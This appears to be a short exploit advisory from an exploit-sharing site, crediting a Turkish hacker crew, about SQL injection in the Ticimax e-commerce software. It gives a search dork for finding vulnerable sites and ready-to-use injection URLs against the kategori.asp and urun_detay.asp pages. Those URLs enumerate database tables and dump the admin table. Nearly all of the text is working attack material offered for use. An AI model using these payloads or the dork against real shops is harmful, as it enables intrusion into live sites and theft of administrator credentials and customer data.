Ticimax E-Ticaret SQL Injection Vulnerability

=============================================
Ticimax E-Ticaret SQL Injection Vulnerability
=============================================


#####################
# Author: [Neuromancer]
# contact : msn[at]neurom4ncer[dot]com
# From : TURKEY
#####################
 
 
Ticimax e-ticaret ( Kategori.asp, urun_detay.aspLocal SQL Injection Vulnerability
 
Dork : "Bu Site Ticimax E-Ticaret yazılımı ile hazırlanmıştır"
 
 
======================================================================
 
                       --=[ Vuln C0de ]=-
  
                               [-] localhost/kategori.asp?id='
                               [-] localhost/urun_detay.asp?id='
 
http://[Site].com/kategori.asp?id=1 order by 1
http://[Site].com/kategori.asp?id=1 union select x,x,group_concat(table_name)+from+information.schema.tables
 
or
 
http://[Site].com/kategori.asp?id=1 union select * from admin
 
=========================| -=[ Attackerz Crew co. ]=- |=========================
 
Gr33t'z; h4cker.tr, by_fatih, by.kiki, TheNesa, RedMasTeR



#  0day.today [2018-04-06]  #